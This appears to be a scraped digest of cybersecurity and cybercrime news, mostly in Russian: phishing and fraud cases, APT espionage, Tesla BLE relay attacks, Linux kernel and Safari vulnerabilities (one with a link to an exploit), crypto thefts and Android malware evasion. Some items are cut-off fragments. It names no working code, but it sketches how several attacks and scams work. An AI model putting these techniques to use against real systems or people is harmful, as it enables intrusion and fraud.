“Microsoft is fulfilling the order of the Pentagon and special services to bring under absolute control the entire Ukrainian information infrastructure and deprive it of any ‘digital sovereignty.’ In fact, the company itself admitted this in the report,” Syromolotov made the remarks in response to Microsoft’s study, in which the corporation accused Russia of cyberattacks against Ukraine and its allies.
The Russian diplomat claimed that Microsoft Advanced Threat Analytics in particular had promised the Ukrainian authorities defense against focused cyberattacks and persuaded them to give it remote access to their networks, giving the internet giant all the tools required to conduct digital provocations and false-flag cyberattacks.
“In particular, [it is done] with the use of the controlled folder access function in the Microsoft Defender cyberthreat protection application. With the help of RiskIQ services, under the pretext of assessing the level of information resources security of Ukraine’s state bodies, devices with well- known unpatched vulnerabilities have been identified, which can now be used by the Americans,” Syromolotov said.
The Russian envoy thinks Microsoft wants to demonstrate its efforts to its US
supporters in an effort to win a piece of the $15 billion funding set aside by
the Pentagon for cyberwarfare.
According to Syromolotov, the Microsoft report’s unfounded conclusions were
observed not just in Russia but also in the US, especially by Johns Hopkins
University researchers.
Исследователи из британской ИБ-компании [нашли уязвимость
](https://newsroom.nccgroup.com/news/ncc-group-uncovers-bluetooth-low-energy-
ble-vulnerability-that-puts-millions-of-cars-mobile-devices-and-locking-
systems-at-risk-447952)в технологии Bluetooth Low Energy, которая позволяет
хакерам удалённо открыть, завести и привести в движение электрокары Tesla. Они
используют BLE для определения того, что владелец находится поблизости, и
чтобы он мог контролировать авто без традиционного ключа.
Поскольку эта технология для определения близости пользователя применяется в
миллионах других автомобилей, смарт-замков, ноутбуков, смартфонов и прочих
устройств, они тоже находятся в зоне риска.
По словам экспертов, кибератаку можно осуществить очень просто и при помощи доступного оборудования.
[В случае Tesla ](https://research.nccgroup.com/2022/05/15/technical-advisory- tesla-ble-phone-as-a-key-passive-entry-vulnerable-to-relay-attacks/)приложение для владельцев позволяет использовать вместо привычного ключа смартфон. Это удобно, но в то же время подвергает авто угрозе взлома.
Уязвимость продемонстрировали на примере Model 3 2020 г. в. Несмотря на
защитные меры производителя, исследователи с расстояния в сотни метров от
электрокара смогли заставить машину думать, что настоящий владелец (вернее,
его телефон) рядом с ней, хотя на самом деле он был в 25 метрах вне радиуса
действия BLE. Предположительно, то же самое можно провернуть на Model Y. Всего
в мире было продано более 2 млн авто этих моделей.
В NCC Group связались по поводу проблемы с соответствующей командой Tesla. Там
сказали, что знают о ней. Организация Bluetooth SIG, которая курирует
разработку стандарта Bluetooth, говорит, что придаёт большое значение
безопасности и работает над устранением уязвимостей.
Федеральное ведомство по защите конституции Германии (контрразведка ФРГ) предупредило о волне хакерских атак из Китая на германские компании. Об этом в среду сообщило издание Der Spiegel со ссылкой на циркулярное письмо, имеющееся в его распоряжении.
По его информации, ведомство обладает "данными о продолжающейся кампании кибершпионажа, проводимого хакерской группой APT 27". Контрразведка ФРГ, как пишет газета, убеждена, что за аббревиатурой APT 27 стоит китайская хакерская группировка, также известная под названием Emissary Panda. Ранее, по утверждению издания, ее уже привлекали к ответственности за атаки на государственные учреждения стран Запада.
Федеральное ведомство по защите конституции Германии предупреждает, что в настоящее время наблюдается "рост атак на германские цели". По информации газеты, атаки злоумышленников направлены, в частности, на фармацевтические и технологические компании. При этом указывается, что в отдельных случаях атаки уже были успешными и данные были похищены. Кроме того, как подчеркнули в ведомстве, нельзя исключать того, что хакеры, "помимо кражи информации, составляющей коммерческую тайну, и интеллектуальной собственности", не пытались также проникнуть в базу данных клиентов и поставщиков услуг компаний.
По данным контрразведки ФРГ, для своих атак злоумышленники использовали вредоносное ПО HyperBro, которое в том числе находило уязвимости в программе AdSelfService Plus от индийского производителя Zoho. Хакеры также пытались получить доступ к базам данных, используя уязвимость в программе Microsoft Exchange. Власти Германии неоднократно предупреждали об этом огромном пробеле в системе безопасности, о котором известно с марта 2021 года. Тем не менее спустя несколько месяцев, по-видимому, не все компании отреагировали на это.
В своем циркуляре ведомство также опубликовало множество технических подробностей, в том числе список IP-адресов, которые, как утверждается, принадлежат контрольным серверам вредоносного ПО. Обнародование подобных сведений должно, с одной стороны, помочь IТ-специалистам обнаруживать и отражать атаки. С другой стороны, власти часто связывают это со стратегическим сигналом злоумышленникам о том, что их методы отслеживаются.
Злоумышленник обманул трех граждан, сдав им в долговременную аренду чужую квартиру. Кроме этого, он скрывался от следствия за ранее совершенное киберпреступление. Сейчас следователи завершили досудебное расследование и направили обвинительный акт в суд. Мужчине грозит до пятнадцати лет тюремного заключения.
Напомним, в октябре полиции Киева поступило сообщение от местной жительницы о том, что она обнаружила на онлайн-платформе объявлений фотографии своего жилья с предложением долговременной аренды. Женщина рассказала, что накануне сдала свою квартиру, которая расположена на улице Вифлеемская, неизвестному мужчине на трое суток. Поскольку заявительница находится за границей, то ключи от жилья «квартиранту» отдавала ее подруга. Тогда, для проверки информации по указанному адресу прибыли правоохранители.
Оперативные работники Днепровского управления полиции обнаружили возле квартиры предполагаемого подозреваемого и выяснили, что он уже успел обмануть трех человек. Злоумышленник в течение суток «сдал» квартиру на длительный срок, взяв с арендаторов всего 28 000 гривен оплаты. Мужчина представлялся владельцем, демонстрировал желающим арендовать жилье поддельные документы, а также подписал с ними фиктивные договоры и отдал дубликаты ключей.
Полицейские установили потерпевших лиц и отобрали заявления о совершении в отношении них преступления. Во время проверки телефона подозреваемого правоохранители обнаружили, что желающих арендовать квартиру было еще несколько, но нарушитель не успел с ними встретиться.
Во время проверки информации полицейские выяснили, что фигурант находится в розыске, поскольку он нарушил избранную меру пресечения в виде домашнего ареста и скрывался от следствия. Следователи еще в июле сообщили мужчине о подозрении в совершении преступлений, предусмотренными ч. 5 ст. 361 - несанкционированное вмешательство в работу информационной (автоматизированной) системы, направленное на утечку и блокирование информации, совершенное во время действия военного положения и по ч. 3 ст. 190 Уголовного кодекса Украины
Тогда злоумышленник разместил в социальной сети фишинговую ссылку, которая представляла собой рекламный контент с недостоверной информацией о предоставлении денежной помощи гражданам Украины якобы от благотворительной организации и которая полностью имитировала популярный интернет-банкинг. В дальнейшем, по этой фейковой ссылке перешла женщина и заполнила форму, в которую внесла свои данные о финансовом номере телефона банковского счета, персональные и другие конфиденциальные данные. Этими данными воспользовался злоумышленник. Он перевыпустил банковскую карточку, привязав ее к другому финансовому счету и номеру телефона, а также создал собственный пин-код. Это позволило подозреваемому снять со счета потерпевшей 20 000 гривен наличных через терминал, а затем перечислить на подконтрольной счет еще 40 000 гривен с социального счета женщины.
Следовательно, оперативные работники территориального подразделения задержали нарушителя в порядке ст. 191 Уголовного процессуального кодекса Украины. Им оказался 28-летний киевлянин, который ранее привлекался к уголовной ответственности за кражи и разбой.
Под процессуальным руководством Днепровской окружной прокуратуры г. Киева следователи сообщили фигуранту о подозрении в совершении преступления, предусмотренного ч. 2 ст. 190 Уголовного кодекса Украины - мошенничество, совершенное повторно. Меру пресечения в виде содержания под стражей суд избрал нарушителю в рамках досудебного расследования совершенного ранее киберпреступления и мошенничества.
Сейчас следователи завершили досудебные расследования и направили материалы уголовных производств вместе с обвинительными актами в суд для рассмотрения дела по существу. Мужчине грозит от десяти до пятнадцати лет лишения свободы с лишением права занимать определенные должности или заниматься определенной деятельностью сроком до трех лет.
Злоумышленники создавали и рассылали фишинговые ссылки под видом оформления социальной помощи. Таким образом они получали данные о банковских картах граждан и в дальнейшем присваивали из них деньги. Фигурантам объявлено о подозрении. Подозреваемым грозит до двенадцати лет заключения.
Участников группировки разоблачили сотрудники Управления противодействия киберпреступлениям в Харьковской области совместно со следователями Харьковского районного управления полиции под процессуальным руководством Харьковской окружной прокуратуры.
Организовали противоправную деятельность двое жителей Харьковщины. К «схеме» молодые люди привлекли еще двух сообщников. Организаторы создавали фишинговые сайты, интерфейс которых был подобен официальным вебресурсам государственных банков. Фигуранты обменивались фишинговыми ссылками с другими сообщниками в специально созданном Telegram-канале.
В дальнейшем правонарушители распространяли ссылки на фишинговые вебсайты среди пользователей социальных сетей и мессенджеров. Гражданам предлагали заполнить онлайн-формы для получения финансовой помощи от международных организаций или выплаты социальной помощи от государства, в том числе еПоддержки. Перейдя по ссылкам, потерпевшие попадали на фишинговый ресурс, где вводили данные банковских карт.
Таким образом злоумышленники получали доступ к счетам граждан и присваивали их сбережения. В дальнейшем полученные средства правонарушители «выводили» на подконтрольные счета с помощью платежных систем.
Полицейские провели обыски в домах фигурантов. Изъяты компьютерная техника, накопители данных, мобильные телефоны, банковские карточки и деньги.
По результатам расследования правоохранителями установлено 13 эпизодов преступной деятельности членов группировки.
Участникам преступной группы объявлено о подозрении по ч. 4 ст. 190 (Мошенничество) в редакции Уголовного кодекса Украины, действующей до 11.08.2023. Фигурантам избраны меры пресечения в виде содержания под стражей. Злоумышленникам грозит до двенадцати лет лишения свободы.
Продолжаются следственные действия с целью установления полного круга пострадавших лиц.
Израиля и Палестины ](https://www.securitylab.ru/news/542625.php)
Как уязвимости RTSP протокола помогают хактивистам сеять хаос в тылу врага?
 www.securitylab.ru
Минцифры в тестовом режиме запустило маркетплейс российского программного обеспечения. На портале представлены российские продукты, правообладатели которых ранее направили заявки на размещение [через портал Госуслуг](https://searchengines.guru/go?link=https://pos.gosuslugi.ru/lkp/poll- marketplace-po/)
Первыми пользователями маркетплейса стали представители профильных ассоциаций, компаний-разработчиков и заказчиков ИТ-решений — им была направлена рассылка с просьбой направлять комментарии по развитию маркетплейса. В настоящий момент проходит голосование за название маркетплейса, можно предложить свой вариант.
Маркетплейс задуман как площадка для взаимодействия правообладателей и заказчиков ПО. На страницах продуктов представлена информация о ПО, его функциональности, стоимости, совместимости с операционными системами. Для каждого вида отечественного программного обеспечения указаны зарубежные аналоги.
Навигация позволяет выбрать продукт по категории, например, средства разработки, системное ПО, информационная безопасность. Также можно указать, в какой отрасли можно применять решение, например, образование, промышленность, финансы.
Напомним, Минцифры начало принимать заявки от разработчиков на размещение продуктов на маркетплейсе в апреле 2022 года. чтобы попасть на маркетплейс, продукт должен быть включен в Реестр российского ПО.
Источник: CNews
В ядре Linux [выявлена](https://www.openwall.com/lists/oss- security/2022/07/19/4) уязвимость (CVE-2022-21505), позволяющая легко обойти механизм защиты Lockdown, который ограничивает доступ пользователя root к ядру и блокирует пути обхода UEFI Secure Boot. Для обхода предлагается использовать подсистему ядра IMA (Integrity Measurement Architecture), предназначенную для проверки целостности компонентов операционной системы по цифровым подписям и хэшам.
В режиме lockdown ограничивается доступ к /dev/mem, /dev/kmem, /dev/port, /proc/kcore, debugfs, отладочному режиму kprobes, mmiotrace, tracefs, BPF, PCMCIA CIS (Card Information Structure), некоторым интерфейсам ACPI и MSR- регистрам CPU, блокируются вызовы kexec_file и kexec_load, запрещается переход в спящий режим, лимитируется использование DMA для PCI-устройств, запрещается импорт кода ACPI из переменных EFI, не допускаются манипуляции с портами ввода/вывода, в том числе изменение номера прерывания и порта ввода/вывода для последовательного порта.
Суть уязвимости в том, что при использовании загрузочного параметра "ima_appraise=log", допускается вызов kexec для загрузки новой копии ядра, если в системе не активен режим Secure Boot и режим Lockdown используется обособленно от него. IMA недопускает включение режима "ima_appraise" при активном Secure Boot, но не учитывает возможность использования Lockdown отдельно от Secure Boot.
Twitter заявил об усилении борьбы с фейками в связи
Twitter временно остановит рекомендации твитов и рекламу на территории России и Украины
Социальная сеть Twitter сообщила , что в свете ситуации вокруг Украины приняла
ряд мер, в числе которых приостановка рекламы для россиян и украинцев, а также
временная остановка рекомендаций твитов во избежание распространения
материалов оскорбительного характера.
"Нашим главным приоритетом является обеспечение безопасности людей в Твиттере.
Мы активно отслеживаем риски, связанные с конфликтом в Украине, в том числе
выявляем и пресекаем попытки распространения ложной и вводящей в заблуждение
информации",- говорится в сообщении компании на русском языке.
Отмечается, что соцсеть активно отслеживает уязвимые профили известных пользователей, включая журналистов, активистов, государственных чиновников и агентств, "чтобы смягчить любые попытки целенаправленного захвата или манипуляции".
"Для людей, использующих Twitter в Украине и России, мы также приостановили некоторые рекомендации твитов от людей, на которых вы не подписаны на Главной, чтобы уменьшить распространение оскорбительного контента", - подчеркивается в сообщении.
Также соцсеть запустила подсказки в разделе "Поиск" и "Главная", которые указывают на "Момент Twitter" с ресурсами цифровой безопасности и защиты на английском, украинском и русском языках.
Напомним что ранее Google сообщил об удалении на YouTube сотен каналов на фоне событий на Украине, а Роскомнадзор начал частично ограничивать доступ к фейсбуку.
Новгородский районный суд вынес обвинительный приговор 21-летнему неоднократно судимому жителю Ставропольского края, который признан виновным в совершении 20 эпизодов преступления, предусмотренного статьей 159 УК РФ «Мошенничество». Его сообщник – 18-летний новгородец признан виновным в совершении 6 эпизодов аналогичного преступления.
В ходе расследования, проведённого Следственным управлением регионального УМВД, установлено, что ставрополец в период с октября 2021 года по январь 2022 года незаконно использовал чужие персональные данные с целью получения микрозаймов. Имея в распоряжении паспортные данные и СНИЛС жителей различных регионов, он оформлял на них кредиты с помощью онлайн-сервисов микрофинансовых организаций. В электронной анкете злоумышленник указывал подконтрольные ему номера мобильных телефонов, банковских карт, а также адреса электронной почты. Сумма кредитов варьировалась от 3 до 25 тысяч рублей, которые он получал путём онлайн-переводов.
Впоследствии во время переписки в сети Интернет он познакомился с несовершеннолетним, на тот момент, новгородцем и предложил ему подзаработать вышеуказанным способом. В итоге, тот согласился и оказал содействие при оформлении нескольких микрозаймов.
В целом, организатор мошеннической схемы за три месяца оформил 24 кредита на жителей Калининградской, Московской, Оренбургской, Саратовской, Свердловской, Челябинской областей, а также республик Чувашия и Татарстан на общую сумму свыше 230 тысяч рублей.
В феврале 2022 года он был задержан сотрудниками угрозыска регионального УМВД на съёмной квартире в Ставрополе и доставлен в Новгородскую область. Одновременно был задержан и его новгородский сообщник.
В настоящее время приговором суда ставропольцу назначено наказание в виде 2,5 лет лишения свободы с отбыванием в исправительной колонии общего режима, а новгородцу – 140 часов обязательных работ.
[ https://xn--b1aew.xn--p1ai/news/item/49275069/ ](https://xn--b1aew.xn-- p1ai/news/item/49275069/)
Владелец издания Wall Street Journal подвергся кибератаке
Хакеры предположительно собирали «разведывательные данные в интересах Китая».
Медиакомпания News Corp, владеющая изданием The Wall Street Journal, сообщила Комиссии по ценным бумагам и биржам США (The United States Securities and Exchange Commission, SEC) о кибератаке, произошедшей в прошлом месяце. Как полагает вице-президент Mandiant по реагированию на инциденты Дэвид Вонг (David Wong), занимающийся расследованием инцидента, злоумышленники скорее всего осуществляли шпионскую деятельность с целью сбора разведданных в интересах Китая.
В январе компания News Corp обнаружила, что одна из ее облачных систем была целью «постоянных кибератак». Киберпреступники могли действовать в интересах иностранного правительства и похитили некоторые данные компании. Финансовые и клиентские данные не пострадали, заверили представители компании. Как сообщило руководство газеты The Wall Street Journal, электронные письма и документы журналистов оказались в руках киберпреступников.
Остается неизвестным, как был осуществлен взлом и сколько данных сотрудников News Corp были затронуты.
Это не первый случай кибератаки китайских хакеров на известное издание. Напомним, в январе 2013 года компьютерные системы The Wall Street Journal были атакованы китайскими хакерами, которые, скорее всего, искали пароли репортеров, освещающих политическую ситуацию в Китае. Однако злоумышленникам не удалось получить доступ к какой-либо важной информации.
Полицейские Иркутска настигли подозреваемого в серии мошенничеств во время служебной командировки в Москву. Фигурант — 33-летний уроженец города Иркутска. Предварительно он несколько лет через сайт знакомств, а также в гостиницах, ресторанах и даже в такси входил в доверие к молодым мужчинам и девушкам и обманывал их. Мужчина рассказывал о своих якобы тяжелых жизненных обстоятельствах и одалживал деньги у новых знакомых. После этого уже не выходил на связь. Иногда только возвращал небольшие части долгов.
На мужчину завели 8 уголовных дел, сообщила официальный представитель МВД России Ирина Волк. Общий ущерб от действий афериста составляет около 8,5 миллиона рублей.
Подозреваемого задержали в Москве, там он арендовал квартиру в элитном ЖК на Минской улице.
Не исключено, что он может быть причастен и к другим противоправным деяниям.
Google AdWords проводит эксперимент с платной службой поддержки для
арбитражников.
Пока все на стадии эксперимента.
Стоимость ~ $50 за 45-минутный звонок.
Услуга в теории может быть востребована арбитражниками, льющим на регулируемые
(белые) igaming офферы.
Скоро активируется услуга звонок другу для траферов гугла
Источник: R2B
Суд Ленинского района Минска вынес обвинительный приговор 13 участникам организованной преступной группы, которая через call-центры завладела деньгами более чем 900 потерпевших, передает корреспондент БЕЛТА.
С учетом позиции государственного обвинителя двенадцать обвиняемых за хищение имущества путем модификации компьютерной информации и мошенничество приговорены к срокам от 6 до 10 лет лишения свободы со штрафом в размере от 50 до 1 тыс. БВ (1 БВ - Br37). Наименьшее наказание - 6 лет и 50 БВ - назначено обвиняемому, который на момент окончания совершения преступлений был несовершеннолетним.
Кроме того, одному фигуранту, обвиняемому еще и в подделке документов, назначено наказание в виде 9 лет лишения свободы со штрафом в размере 1 тыс. БВ.
В ходе судебного следствия установлено, что обвиняемые вступили в организованную преступную группу, которая посредством call-центров занималась преступной деятельностью, связанной с завладением денежными средствами граждан путем мошенничества и модификации компьютерной информации. На протяжении 7 месяцев под видом сотрудников банка либо правоохранительных органов мошенники убеждали граждан предоставлять доступ к их личным счетам.
По словам гособвинителя - помощника прокурора Ленинского района Минска Никиты Плема, каждый из обвиняемых, которым на момент совершения преступных деяний было от 17 до 34 лет, следовал своей заранее определенной роли. Участники ОПГ через Telegram предоставляли другим участникам группы реквизиты банковских карт, находящиеся в их распоряжении. Затем деньги путем внесения в компьютерные системы заведомо ложной информации переводились на карты обвиняемых, обналичивались в банкоматах и распределялись между участниками организованной группы.
В результате преступной деятельности обвиняемых похищено около Br3 млн.
Приговор в законную силу не вступил, может быть обжалован и опротестован в апелляционном порядке.
Эксплуатация уязвимости позволяет злоумышленнику получить полный доступ ко всем учетным записям.
Райан Пикрен (Ryan Pickren), изучающий кибербезопасность, обнаружил уязвимости в web-камерах iPhone и Mac и получил от Apple рекордную выплату в размере $100 500. По словам Пикрена, цепочка из 4 уязвимостей ( CVE-2021-30861 , CVE-2021-30975 и две проблемы без CVE) затрагивает браузер Safari и сервис iCloud.
Эксплуатация уязвимости позволяет злоумышленнику получить полный доступ ко всем учетным записям, включая iCloud и PayPal, а также разрешение на использование микрофона, камеры и демонстрацию экрана. Взлом в конечном итоге предоставляет полный доступ ко всей файловой системе устройства. Данный результат достигается за счет использования файлов webarchive в Safari, которую браузер использует для сохранения локальных копий web-сайтов.
«Поразительная особенность этих файлов заключается в том, что они указывают web-источник, в котором должно отображаться содержимое. Это отличный трюк, позволяющий Safari восстановить контекст сохраненного сайта, но, как указывали авторы Metasploit еще в 2013 году, если злоумышленник сможет каким-то образом изменить этот файл, он сможет эффективно реализовать универсального межсайтового выполнения сценариев», — пояснил Пикрен.
Для проведения атаки злоумышленнику необходимо заставить жертву скачать такой файл web-архива и открыть его.
Apple не прокомментировала ошибку, и неизвестно, использовалась ли она в реальных атаках. Техногигант заплатил Пикрену $100 500 в рамках своей программы вознаграждения за обнаружение уязвимоcтей.
Компания в рамках программы может официально присудить до $1 млн , и Apple публикует список максимальных сумм для каждой категории обнаруженных проблем. От экспертов по безопасности не требуется публично раскрывать сумму, которую они получили. Вполне возможно, что Apple выплатила Пикрену больше $100 500. Компания ранее подвергалась резкой критике за низкие выплаты, а также за медленное исправление уязвимостей.
В USB Gadget, подсистеме ядра Linux, предоставляющей программный интерфейс для создания клиентских USB-устройств и программной симуляции USB-устройств, выявлена уязвимость (CVE-2021-39685), которая может привести к утечке информации из ядра, краху или выполнению произвольного кода на уровне ядра. Атака производится непривилегированным локальным пользователем через манипуляции с различными классами устройств, реализованными на базе API USB Gadget, такими, как rndis, hid, uac1, uac1_legacy и uac2.
Проблема устранена в опубликованных на днях обновлениях ядра Linux 5.15.8, 5.10.85, 5.4.165, 4.19.221, 4.14.258, 4.9.293 и 4.4.295. В дистрибутивах проблема пока остаётся неисправленной (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch). Для демонстрации уязвимости подготовлен прототип эксплоита.
Проблема вызвана переполнением буфера в обработчиках запросов на передачу данных в gadget-драйверах rndis, hid, uac1, uac1_legacy и uac2. В результате эксплуатации уязвимости непривилегированный атакующий может получить доступ к памяти ядра через отправку специального управляющего запроса со значением поля wLength, превышающим размер статического буфера, для которого всегда выделяется 4096 байт (USB_COMP_EP0_BUFSIZ). В ходе атаки можно из непривилегированного процесса в пространстве пользователя прочитать или записать до 65 КБ данных в память ядра.
• Exploit: https://www.openwall.com/lists/oss-security/2021/12/15/4/1
Майнинг не относится к бытовым нуждам, поэтому потребляемая на него электроэнергия не должна оплачиваться по льготному тарифу для населения
В России задумались о повышении тарифов на электроэнергию для майнеров криптовалюты. Они не должны оплачивать услуги по льготным тарифам для населения, считают в Минэнерго. Об этом [сообщает](https://rg.ru/2021/11/29/reg-sibfo/v-minenergo-dopustili-rost- tarifov-na-elektroenergiiu-dlia-majnerov.html) «Российская газета» со ссылкой на представителей Минэнерго.
В ведомстве уточнили, что законодательство различает потребление гражданами электроэнергии для собственных бытовых нужд и в целях осуществления предпринимательской деятельности. Существующие нормы не исключают возможности выявления потребления в жилом помещении для осуществления коммерческой деятельности и проведения расчетов с таким потребителем по ценам, установленным для субъектов предпринимательства.
Власти Иркутской области уже заявили о планах повысить тарифы на электроэнергию для майнеров. В регионе в последний год возросло потребление электричества среди жителей, что привело к повышенной нагрузке на энергосистему.
Подробнее: https://www.securitylab.ru/news/526974.php
В Республике Татарстан в дежурную часть отдела полиции «Ямашевский» УМВД России по г. Казани с сообщением о пропаже 26-летней сестры обратился местный житель. Молодой человек пояснил, что накануне утром она ушла на работу, а под вечер не вернулась домой и перестала отвечать на звонки. Сразу после этого с ним связались неизвестные люди, которые стали требовать за освобождение родственницы выкуп в размере 1 млн рублей.
Сотрудники полиции опросили граждан, которые в последний раз видели девушку, осмотрели записи с камер видеонаблюдения и установили маршрут передвижения пропавшей. Выяснилось, что после работы она направилась в банк, а затем ушла в неизвестном направлении.
В результате оперативно-розыскных мероприятий полицейские установили, что после посещения финансового учреждения родственница заявителя вызывала такси к одному из домов, расположенных по улице Хусаина Мавлютова. Водитель машины был оперативно установлен и опрошен.
Мужчина пояснил, что клиентка отдала ему свой телефон, попросила отвезти его на железнодорожный вокзал «Казань-2» и передать человеку, сидящему на скамейке рядом со входом. Однако когда он прибыл на место, то понял, что никто его не ждал.
Сыщики изъяли гаджет у водителя такси, а затем вместе с ним прибыли к адресу, где тот его получил. В ходе осмотра прилегающей местности оперативники заметили находившиеся неподалёку автомобили скорой медицинской помощи и МЧС и решили узнать, в чём дело. Когда сотрудники полиции подошли поближе, то увидели разыскиваемую местную жительницу, которая выходила из гостиницы, где сработала пожарная сигнализация. Стражи правопорядка остановили девушку и в ходе её опроса поняли, что она стала жертвой телефонных мошенников, и никто её не похищал.
Оказалось, что вечером потерпевшей в одном из мессенджеров написал якобы руководитель с прошлого места её работы. Аферист сообщил, что в скором времени с ней свяжутся представители спецслужб. Затем позвонившие лжеправоохранители убедили собеседницу, что незнакомый ей человек пытается оформить на её имя кредит, и необходимо его опередить. Под этим предлогом девушка сама сходила в банк, где взяла заём в размере 750 тысяч рублей, а затем по указанию звонивших перевела финансы на третьи счета. Ей обещали, что долг будет погашен сразу.
После этого мошенники сказали обманутой местной жительнице, что ей необходимо заселиться в гостиницу под чужим именем и пожить там какое-то время, так как тот злоумышленник, который якобы оформлял на неё заём, но не успел получить деньги, хочет её найти и отомстить. При этом ей запретили показывать паспорт на ресепшене, сказали избавиться от своего телефона и выведали у неё контакты брата.
Позднее аферисты вновь связались с девушкой и сообщили, что мнимый преследователь узнал, где она живёт, и ей необходимо незаметно убежать из хостела. Для этого её убедили поджечь тряпки в своём номере и выбежать на улицу вместе с остальными посетителями, слившись с толпой. Однако подоспевшие полицейские объяснили потерпевшей, что это всё обман.
По данному факту следователями отдела полиции «Ямашевский» УМВД России по г. Казани возбуждено уголовное дело по признакам преступления, предусмотренного частью 3 статьи 159 Уголовного кодекса Российской Федерации. В настоящее время оперативники устанавливают лиц, причастных к преступлению.
Создатель мошеннической криптовалютной схемы Oyster Protocol Амир Бруно Эльмаани, также известный под псевдонимом Bruno Block, получил 4 года тюрьмы за уклонение от уплаты налогов на сумму $5,5 млн.
В апреле этого года Амир Бруно Эльмаани (Amir Bruno Elmaani) признался в том, что создал мошенническую схему Oyster Protocol и «секретно» выпускал и продавал токены Pearl, при этом не выплачивал налоги с прибыли. Общий ущерб государству составил $5,5 млн. При этом Эльмаани сознательно интегрировал «ошибочную» функцию по выпуску токенов Pearl в смарт-контракты проекта. Это позволило ему осуществить экзит-скам.
«Амир Эльмаани нарушил обязанность платить налоги на миллионы долларов прибыли от продажи криптовалют. Также он нарушил доверие инвесторов к токену, который он и основал», ― подчеркнул окружной прокурор Дамиан Уильямс (Damian Williams).
Проект Oyster Protocol был запущен осенью 2017 года и продвигался под видом децентрализованного протокола по хранению данных. В октябре 2018 года Эльмаани выпустил и продал огромное количество токенов Pearl, чем обрушил цену токенов и обесценил вложения инвесторов. Bruno Block заявил, что сделал это в секрете от всех, даже от сотрудников проекта:
«Я прекрасно знал, что люди, купившие токены Pearl не были осведомлены о том, что я выпустил множество токенов и увеличил их общее количество».
Средства Эльмаани потратил на яхты, дома и запуск новых компаний, не связанных с криптовалютами. Обвинения ему предъявили еще в 2020 году.
Одноранговая транзакционная сеть Mixin Network, предназначенная для масштабирования и ускорения транзакций, сообщает, что временно приостанавливает внесение и снятие средств. Дело в том, что в минувшие выходные платформу скомпрометировали, и похитили около 200 млн долларов.
Компания, которая описывает себя как разработчика «опенсорсного программного обеспечения, в котором безопасность, конфиденциальность и децентрализация всегда стоят на первом месте», сообщает, что взлом произошел 23 сентября 2023 года и был связан с компрометацией неназванного поставщика облачных услуг.
В социальной сети X (ранее Twitter) разработчики пишут, что работа Mixin Network возобновится только после того, как «все уязвимости будут выявлены и устранены». Также сообщается, что компания обратилась за помощью в проведении расследования к экспертам Google и компании SlowMist, специализирующейся на блокчейн-безопасности.
«Команда Mixin решит как поступить с потерянными активами после завершения [расследования]», — добавляют разработчики, уверяя, что уже ищут способы решения этой проблемы.
Click to expand...
Аналитики PeckShield и Lookonchain отследили примерно 141 млн долларов из украденных у Mixin Network активов. Так, было похищено около 93,5 млн долларов в ETH, 23,5 млн долларов в DAI (перемещены из USDT) и 23,3 млн долларов в BTC.
[](https://xakep.ru/wp- content/uploads/2023/09/437207/amounts.jpg)
В свою очередь эксперты SlowMist, принимающие участие в расследовании, подтвердили, что у Mixin Network было похищено примерно 200 млн долларов.
В мире, где киберугрозы становятся все более актуальными, Google предпринимает новые шаги для защиты личной информации своих пользователей. Сегодня компания объявила о запуске функции «Dark Web Report» для индийских подписчиков Google One.
Что такое Dark Web Report и почему это важно?
Даркнет является мрачным уголком интернета, где происходят многочисленные незаконные действия — от торговли наркотиками до продажи украденных данных. Ваши личные данные – имя, дата рождения, номера телефонов и электронные адреса – могут стать объектом интереса киберпреступников. Функция «Dark Web Report» активно наблюдает за вашей информацией и предупреждает об её утечке.
Пользователи, активировавшие «Dark Web Report», создают уникальный профиль, в котором указывают данные, требующие специализированного мониторинга. Если указанная информация обнаруживается в утечке в тёмной сети, система отправляет пользователю уведомление, позволяя своевременно принять меры по защите данных. Стоит отметить, что подписчики Google One получают расширенные возможности мониторинга: настройку времени обновлений и экспертные рекомендации по действиям в случае обнаружения утечки данных.
Функция также стала доступна для пользователей Индии, где число случаев кибермошенничества растёт с каждым годом. Dark Web Report представляет собой значительный шаг в сторону укрепления цифровой безопасности индийских пользователей.
Отметим, что Google впервые объявила о запуске функции для пользователей Gmail в мае этого года. После включения функции пользователи Gmail могут сканировать даркнет на предмет своих адресов электронной почты и предпринимать меры для защиты данных на основе рекомендаций Google. Например, пользователю может быть предложено включить двухфакторную аутентификацию (2FA), чтобы защитить свой аккаунт от попыток взлома.
Аналитики проанализировали более трёх тысяч APK-файлов из неофициальных источников. Оказалось, что многие из них используют неподдерживаемые или неизвестные алгоритмы сжатия данных. Это позволяет вредоносному ПО успешно противостоять статическому анализу и затрудняет изучение принципов его работы специалистами по кибербезопасности.
Исследователи выявили 71 активно распространяемую вредоносную программу. Каждая без каких-либо проблем функционирует на Android 9 и более свежих версиях. Сокрытие вредоносной составляющей приложений стало возможным благодаря использованию неподдерживаемых методов сжатия, которые ранее вели к банальному вылету из программы, а теперь просто маскируют её зловредную активность.
Кроме того, некоторые образцы вредоносов используют имена файлов, длина которых превышает 256 байт. Это приводит к сбоям в работе инструментов анализа кода. Другой распространённый приём, выявленный специалистами, — маскировка и изменение содержимого файла AndroidManifest.xml, отвечающего за настройки приложения.
По словам экспертов Zimperium, все эти методы направлены исключительно на сокрытие истинных целей вредоносных программ. Хотя конкретные варианты атак пока неизвестны, очевидно, что разработчики таких приложений преследуют далеко не благие намерения.
На данный момент ни одно из выявленных приложений не присутствует в официальном магазине Google Play. Однако они активно распространяются через неофициальные ресурсы. В своём отчёте исследователи также опубликовали хеши этих файлов, чтобы пользователи могли проверить свои устройства и удалить опасные программы, если таковые имеются.
Чтобы обезопасить себя от новейших угроз для Android, эксперты рекомендуют:
-По возможности отказаться от установки приложений из непроверенных источников и отдавать предпочтение только официальному Google Play.
-Внимательно изучать запрашиваемые приложением разрешения перед установкой. Отклонять запросы, не связанные с основными функциями.
-Не рутировать свои устройства, чтобы не давать приложениям повышенных привилегий.
-Обязательно проверять любые устанавливаемые приложения антивирусом перед запуском.
Лишь постоянная бдительность и осторожность помогут обезопасить Android- смартфон и данные в нём от всё новых и новых уловок злоумышленников.
По данным Shadowserver Foundation, сотни серверов Citrix NetScaler ADC и Gateway были взломаны злоумышленниками для развертывания веб-оболочек.
Некоммерческая организация заявила, что в ходе атак эксплуатируется критическая уязвимость внедрения кода CVE-2023-3519 (CVSS 9.8) , которая приводит к удаленному выполнению кода (Remote Code Execution, RCE) без проверки подлинности. О недостатке стало известно ещё в июле, когда компания Citrix сообщила об ошибке корпоративным пользователям NetScaler ADC и NetScaler Gateway.
